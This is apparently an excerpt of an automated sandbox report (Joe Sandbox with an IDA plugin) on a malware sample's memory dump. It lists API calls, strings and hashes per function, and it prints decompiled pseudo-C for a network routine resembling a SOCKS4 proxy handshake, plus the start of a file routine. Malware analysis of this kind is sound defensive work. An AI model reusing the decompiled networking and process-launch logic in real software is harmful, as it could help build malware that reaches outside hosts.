fclose.MSVCRT ref: 0040C455

Strings

x3B, xrefs: 0040C325

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _vsnprintffclosefgetsfopengetenv
String ID: x3B
API String ID: 3106633423-3373966710
Opcode ID: f5b2f3e6b188a2a81523bee3868d1dc16278d61a1535bb2d55c529db898f20e7
Instruction ID: 6048a10f2db6f6121dbf09b1e91f7eeb88fe885a8aaa66a3f769cde923567c5e
Opcode Fuzzy Hash: f5b2f3e6b188a2a81523bee3868d1dc16278d61a1535bb2d55c529db898f20e7
Instruction Fuzzy Hash: EC41D8B0408311DAD310AF25D58526EBAF4BF84758F50CA2FE4D897381D77C8585DB5B

Uniqueness

Uniqueness Score: -1.00%

Function 00405328, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89
networkCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00405328(void* __edx, char _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v284;
				char _v286;
				char _v288;
				char _v289;
				char _v293;
				char _v295;
				char _v296;
				char _v297;
				char _v317;
				char _v336;
				char* _v340;
				char* _v344;
				char _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				char _v360;
				char _v361;
				intOrPtr _v380;
				char _v384;
				intOrPtr _v388;
				void* _t53;
				intOrPtr _t56;
				signed int _t57;
				char _t60;
				void* _t61;
				void* _t62;
				char* _t63;
				char* _t64;
				char* _t65;
				intOrPtr* _t67;
				intOrPtr* _t68;

				_t62 = __edx;
				_t60 = _a4;
				_v340 =  &_v288;
				if(E004051B5(_t61, __edx, _a8, _a12) != 0) {
					_t64 =  &_v297;
					E004129E4(_t64, 0, 9);
					_v340 = 2;
					_v297 = 4;
					_v296 = 1;
					_v344 =  &_v286;
					_v348 =  &_v295;
					E00412AA3();
					_t53 = E00412AA3( &_v293,  &_v284, 4);
					_v336 = 0;
					_v340 = 9;
					_v344 = _t64;
					_v348 = _t60;
					_v289 = 0;
					L0041F8FC();
					_t67 =  &_v336 - 0x10;
					if(_t53 != 9) {
						goto L1;
					}
					_t65 =  &_v317;
					_v356 = 4;
					_v360 = 0;
					_t63 =  &_v288;
					 *_t67 = _t65;
					E004129E4();
					_t56 = _t60 + 1;
					_v348 = 0;
					_v352 = 0;
					_v356 = 0;
					_v360 = _t63;
					 *_t67 = _t56;
					_v284 = _t60;
					_v288 = 1;
					L0041F904();
					_t68 = _t67 - 0x14;
					if(_t56 <= 0) {
						goto L1;
					}
					_v380 = _t63;
					_v384 = _t60;
					L0041F94C();
					_push(_t62);
					_push(_t62);
					if(_t56 == 0) {
						goto L1;
					}
					_v380 = 0;
					_v384 = 4;
					_v388 = _t65;
					 *_t68 = _t60;
					L0041F90C();
					if(_t56 != 4) {
						goto L1;
					}
					_t57 = 0;
					if(_v361 == 0) {
						_t57 = 0 | _v360 == 0x0000005a;
					}
					return _t57 & 0x00000001;
				}
				L1:
				return 0;
			}

0x00405328
0x00405335
0x0040533c
0x0040535c
0x00405365
0x0040537c
0x00405385
0x0040538d
0x00405392
0x00405397
0x0040539f
0x004053a2
0x004053be
0x004053c3
0x004053cb
0x004053d3
0x004053d7
0x004053da
0x004053df
0x004053e4
0x004053ea
0x00000000
0x00000000
0x004053f0
0x004053f4
0x004053fc
0x00405404
0x00405408
0x0040540b
0x00405410
0x00405413
0x0040541b
0x00405423
0x0040542b
0x0040542f
0x00405432
0x00405436
0x0040543e
0x00405443
0x00405448
0x00000000
0x00000000
0x0040544e
0x00405452
0x00405455
0x0040545c
0x0040545d
0x0040545e
0x00000000
0x00000000
0x00405464
0x0040546c
0x00405474
0x00405478
0x0040547b
0x00405486
0x00000000
0x00000000
0x0040548c
0x00405493
0x0040549c
0x0040549c
0x00000000
0x0040549f
0x0040535e
0x00000000

APIs

Part of subcall function 004051B5: gethostbyname.WS2_32 ref: 004051C5
Part of subcall function 004051B5: htons.WS2_32 ref: 00405202

send.WS2_32 ref: 004053DF
select.WS2_32 ref: 0040543E
__WSAFDIsSet.WS2_32 ref: 00405455
recv.WS2_32 ref: 0040547B

Strings

Z, xrefs: 00405497

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: gethostbynamehtonsrecvselectsend
String ID: Z
API String ID: 3406712544-1505515367
Opcode ID: 08e5545b55d0726f048abc6bcebcb3a14c2526b5ed493a6cd974a8e689c870df
Instruction ID: 23d78d97f939ce5eec82cec168d6e0a92f1c2ef35d1e3e5c2e22ff38ea37f4dc
Opcode Fuzzy Hash: 08e5545b55d0726f048abc6bcebcb3a14c2526b5ed493a6cd974a8e689c870df
Instruction Fuzzy Hash: 7941D3B0419740AEE750EF25C58439FBBE4EF84748F409C2EF8D897241D3BA85888B57

Uniqueness

Uniqueness Score: -1.00%

Function 004109D8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00410A0F
RegEnumKeyExA.ADVAPI32 ref: 00410A66
RegCloseKey.ADVAPI32 ref: 00410AC5

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

Strings

@, xrefs: 00410A85
@, xrefs: 00410AB1

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen_vsnprintf
String ID: @$@
API String ID: 2247870055-149943524
Opcode ID: 8d498efbd62415471bda5190047cb5f1931c584f14dab4a943159cb9ae31fe5a
Instruction ID: 60464b3a6ff270cdd1110ed30ec9e4aee9a85b9f4642497f56cba53994ffc826
Opcode Fuzzy Hash: 8d498efbd62415471bda5190047cb5f1931c584f14dab4a943159cb9ae31fe5a
Instruction Fuzzy Hash: A321E3B45083019FD310EF6AC18479BBBE4BF98358F40892EE5D893340D7B895898F97

Uniqueness

Uniqueness Score: -1.00%

Function 00407BA7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 00407BD8
MultiByteToWideChar.KERNEL32 ref: 00407C04
SHFileOperationW.SHELL32 ref: 00407C4E

Part of subcall function 0040729C: MultiByteToWideChar.KERNEL32 ref: 004072D5
Part of subcall function 0040729C: GetFileAttributesW.KERNEL32 ref: 004072E0

Strings

b/B, xrefs: 00407C46
b/B, xrefs: 00407C24

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: ByteCharFileMultiWide$AttributesOperationstrcpy
String ID: b/B$b/B
API String ID: 1429716934-3141599630
Opcode ID: 81200923591543ee51a94f846a27d562b6fb7f64c7317926669ce86d985d9e29
Instruction ID: 9f716be5a706bacff7abee470f2f70c9786abf008b7cce54c5bda874f4371efe
Opcode Fuzzy Hash: 81200923591543ee51a94f846a27d562b6fb7f64c7317926669ce86d985d9e29
Instruction Fuzzy Hash: ED1125B14083109AE310EF25D48935BBBF5EFC4318F40892EF4A49B281D7BA96498B97

Uniqueness

Uniqueness Score: -1.00%

Function 00406D22, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32 ref: 00406DD4
CloseHandle.KERNEL32 ref: 00406DE7
CloseHandle.KERNEL32(00000000), ref: 00406DF4

Strings

D, xrefs: 00406D31
D, xrefs: 00406D51

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: D$D
API String ID: 2922976086-143366177
Opcode ID: 210b95e98878966edea71671788c2c7d13693a52d3674cbc12837110b92085ad
Instruction ID: 1d5ca1a389bb095c29e0a852d1ac0a4b0f4293584b711be652509fdf01780871
Opcode Fuzzy Hash: 210b95e98878966edea71671788c2c7d13693a52d3674cbc12837110b92085ad
Instruction Fuzzy Hash: 4311A2B05087409EE710EF25C59875BBBE4BF85708F01881EF5D897291C3BA95898B87

Uniqueness

Uniqueness Score: -1.00%

Function 0040E9B6, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strncpy.MSVCRT ref: 0040EB64
strcpy.MSVCRT ref: 0040EB74
strcmp.MSVCRT ref: 0040EB80

Strings

5B, xrefs: 0040EC46
0, xrefs: 0040ED3C

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: strcmpstrcpystrncpy
String ID: 0$5B
API String ID: 2448526034-2982329479
Opcode ID: 462bf65ad2594f2168f17dfdeb5058b5c81af0c365ae975b7d05b17481ebe7e2
Instruction ID: 1815abc7d942603e6bf714ecb897f5d3e1623bfaa8687e7908f6a9e0f2ae8c78
Opcode Fuzzy Hash: 462bf65ad2594f2168f17dfdeb5058b5c81af0c365ae975b7d05b17481ebe7e2
Instruction Fuzzy Hash: 63B1BBB45093459FC750EF29C18469FBBE0FF88348F408D2EE4D897291E7B9D9898B46

Uniqueness

Uniqueness Score: -1.00%

Function 00408C65, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00408C81
malloc.MSVCRT ref: 00408D36
malloc.MSVCRT ref: 00408D91

Strings

@, xrefs: 00408DEB
:, xrefs: 00408DFB

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: malloc
String ID: :$@
API String ID: 2803490479-1367939426
Opcode ID: 92bcfbf36f97e7b9ce3a5bb17cc0fb52a2a6fa959f7768e43986a6bb5ba9e5b6
Instruction ID: ef4ad269280774ff2184a95f10acb59d81b6a7d54bd4368cac39de452cc0daf6
Opcode Fuzzy Hash: 92bcfbf36f97e7b9ce3a5bb17cc0fb52a2a6fa959f7768e43986a6bb5ba9e5b6
Instruction Fuzzy Hash: 975128B05087009FD310EF29D58425ABBE0FF88718F41892EF5D887291D7B8958ACF8A

Uniqueness

Uniqueness Score: -1.00%

Function 0040567B, Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 004056B5
recv.WS2_32 ref: 00405703
htons.WS2_32 ref: 00405774
send.WS2_32 ref: 004057B1
recv.WS2_32 ref: 004057DB

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: recvsend$htons
String ID:
API String ID: 2448738288-0
Opcode ID: 13adfa5ec2ebdb7ed79ded53f4b099e9918976a4c5f06ce693c8d3bcc2d3ec54
Instruction ID: a3ad6d79acf2e53900b9dd159f4be09f546f61b4e8b2614ee158af40ae1285e8
Opcode Fuzzy Hash: 13adfa5ec2ebdb7ed79ded53f4b099e9918976a4c5f06ce693c8d3bcc2d3ec54
Instruction Fuzzy Hash: 8A410BB141C7819AD710AF25C54939FBFE0AF94308F458D2EE4D897282D3B99688CF97

Uniqueness

Uniqueness Score: -1.00%

Function 00410520, Relevance: 7.6, APIs: 5, Instructions: 61registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00410558
RegQueryValueExA.ADVAPI32 ref: 00410596
malloc.MSVCRT ref: 004105A9
RegQueryValueExA.ADVAPI32 ref: 004105D9
RegCloseKey.ADVAPI32 ref: 004105F8

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: QueryValue$CloseOpenmalloc
String ID:
API String ID: 3087825141-0
Opcode ID: a5a8d7ed265dbacac949492c225b59f34b6479b8ecf545dfcad59583b2771f2c
Instruction ID: dddce03a098769392e7a375fb59deb789f7659c2eda9270703039da878427773
Opcode Fuzzy Hash: a5a8d7ed265dbacac949492c225b59f34b6479b8ecf545dfcad59583b2771f2c
Instruction Fuzzy Hash: EC21A3B05083019FD700EF29D58465BBBE4BF88748F00892EF8C893201E778DA888F86

Uniqueness

Uniqueness Score: -1.00%

Function 00421320, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 0042152C
_assert.MSVCRT ref: 00421551

Strings

, xrefs: 004213B0
c, xrefs: 0042153A

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _assert
String ID: $c
API String ID: 1222420520-3797896886
Opcode ID: 8a585c7f6f4847e6cdab404632b1628f0989679c9260e782601c46f9716b7191
Instruction ID: 595662ab794f8c563696035dacf2dbdab12226766188b8df76e1304a900497cc
Opcode Fuzzy Hash: 8a585c7f6f4847e6cdab404632b1628f0989679c9260e782601c46f9716b7191
Instruction Fuzzy Hash: 1E71DDB5A083199FDB00EF69D48859EBBE0EF88354F01C92EF89997351C3389854CF96

Uniqueness

Uniqueness Score: -1.00%

Function 00420700, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 131COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00420850
_assert.MSVCRT ref: 004208AD

Strings

M, xrefs: 00420896
HjB, xrefs: 0042089E

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _assert
String ID: HjB$M
API String ID: 1222420520-1889629911
Opcode ID: 389ade0749032fac037805b9abc3480a8171c3f13d13cda5c72ac285551c0497
Instruction ID: 88b4d72e3a3b074a803e33dc480ae7ecbd49f2114936249b734713bf6416a905
Opcode Fuzzy Hash: 389ade0749032fac037805b9abc3480a8171c3f13d13cda5c72ac285551c0497
Instruction Fuzzy Hash: 0951BB716083A28FC300CF28E59052BBBF1BFCA310F048A1EE69087645D335EA19CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00406B2B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

_wfopen.MSVCRT ref: 00406B69
fread.MSVCRT ref: 00406BA2
fclose.MSVCRT ref: 00406C1A

Strings

D/B, xrefs: 00406B5E

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _wfopenfclosefread
String ID: D/B
API String ID: 506435840-35448031
Opcode ID: 6e29f1c7595fdd67799a25fafd9a4aaf63ccba13522d3f48157b685555bab8a5
Instruction ID: deb419f91eb23376f6420ea6a160b5129c3192077bfb07f8c7133106a8e0e032
Opcode Fuzzy Hash: 6e29f1c7595fdd67799a25fafd9a4aaf63ccba13522d3f48157b685555bab8a5
Instruction Fuzzy Hash: 3D21A3701087508FD720EF29C5847AEBBE0EF85318F41892EE8D887392D7789499CB47

Uniqueness

Uniqueness Score: -1.00%

Function 0040B016, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 0040B056
fread.MSVCRT ref: 0040B080
fclose.MSVCRT ref: 0040B0F3

Strings

z3B, xrefs: 0040B091

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: fclosefopenfread
String ID: z3B
API String ID: 2679521937-3399381272
Opcode ID: e2600f1d5f8662e9c392fe55e0e07e3544c7b57ce058911e094c9610cb459c02
Instruction ID: 2438fad20f86bae77410323f418e8e562921bdaa67428cf1c8451c05b399b209
Opcode Fuzzy Hash: e2600f1d5f8662e9c392fe55e0e07e3544c7b57ce058911e094c9610cb459c02
Instruction Fuzzy Hash: 9B213EB05493459ED310AF65C5843AFBBE0EF80348F01883EE8E887341D77C8589DB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0040B105, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 0040B145
fread.MSVCRT ref: 0040B16F
fclose.MSVCRT ref: 0040B1E2

Strings

x3B, xrefs: 0040B13A

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: fclosefopenfread
String ID: x3B
API String ID: 2679521937-3373966710
Opcode ID: cef17687d92d9b4a792fbe74fccce4ea79b1ff820fbda775a6627d7b36aa9cc9
Instruction ID: 8e46bd977f0b38dff8dfac3cdc2039ee507d5f54b24c6ee619e1854a5548e2c2
Opcode Fuzzy Hash: cef17687d92d9b4a792fbe74fccce4ea79b1ff820fbda775a6627d7b36aa9cc9
Instruction Fuzzy Hash: 85213EB05493059ED320AF65C59879FBBE0EF84358F00882EE8D887251D77C8588DB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00414470, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61processthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00406F1A: MultiByteToWideChar.KERNEL32 ref: 00406F53
Part of subcall function 00406F1A: GetFileAttributesW.KERNEL32 ref: 00406F5E

Part of subcall function 00407E8C: fopen.MSVCRT ref: 00407E9F
Part of subcall function 00407E8C: fread.MSVCRT ref: 00407EC7
Part of subcall function 00407E8C: fclose.MSVCRT ref: 00407ED4

CreateProcessA.KERNEL32 ref: 0041451B

Part of subcall function 00408AF3: ReleaseMutex.KERNEL32(?,?,?,?,?,?,0041452C), ref: 00408B02
Part of subcall function 00408AF3: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,0041452C), ref: 00408B10

Part of subcall function 00405999: shutdown.WS2_32 ref: 004059B6
Part of subcall function 00405999: closesocket.WS2_32(00000000), ref: 004059C2

ResumeThread.KERNEL32 ref: 00414542
ExitProcess.KERNEL32 ref: 00414552

Strings

D, xrefs: 004144A8

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Process$AttributesByteCharCloseCreateExitFileHandleMultiMutexReleaseResumeThreadWideclosesocketfclosefopenfreadshutdown
String ID: D
API String ID: 3751753202-2746444292
Opcode ID: c255f5552f9746074c148be93691e2b4ce4c54ed22f108db594dde55dd1560b6
Instruction ID: 067f5d9187edf2fa4930e283bd60014924ca834b1665164d65a9df55d347b5cc
Opcode Fuzzy Hash: c255f5552f9746074c148be93691e2b4ce4c54ed22f108db594dde55dd1560b6
Instruction Fuzzy Hash: C721B0B05087419AD710AF66C59976FBBE0BF80348F01881EE5D85B382D7BD8489CF9B

Uniqueness

Uniqueness Score: -1.00%

Function 00401261, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00401268
getenv.MSVCRT ref: 00401329

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

Part of subcall function 00407F08: _beginthreadex.MSVCRT ref: 00407F3A
Part of subcall function 00407F08: CloseHandle.KERNEL32 ref: 00407F48

Strings

%6\%6.dfd, xrefs: 0040132E
TEMP, xrefs: 00401322

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: CloseHandle_beginthreadex_vsnprintfgetenvmalloc
String ID: %6\%6.dfd$TEMP
API String ID: 32720251-3655689890
Opcode ID: 667e9834810fc7f26c4f5814988b60aa762ffe94d6d13ea4869a8cf1b9f5be51
Instruction ID: 095e309c488b84dd6e8baa1bc898f34efff603a6fbd504479eb7308a9430591a
Opcode Fuzzy Hash: 667e9834810fc7f26c4f5814988b60aa762ffe94d6d13ea4869a8cf1b9f5be51
Instruction Fuzzy Hash: 78218EF05087419FD310AF6AD18839AFBE0BF84358F00892EE1E987291D7BD95899F46

Uniqueness

Uniqueness Score: -1.00%

Function 0041ED42, Relevance: 6.1, APIs: 4, Instructions: 66
fileCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E0041ED42(void* __eflags, char _a12, signed int _a18, intOrPtr _a40, char _a48, signed int _a65616, signed int _a65620) {
				signed int _v4;
				int _v8;
				void* _v12;
				signed int _t24;
				signed int _t27;
				signed int _t28;
				int _t31;
				signed int _t34;
				signed int _t35;
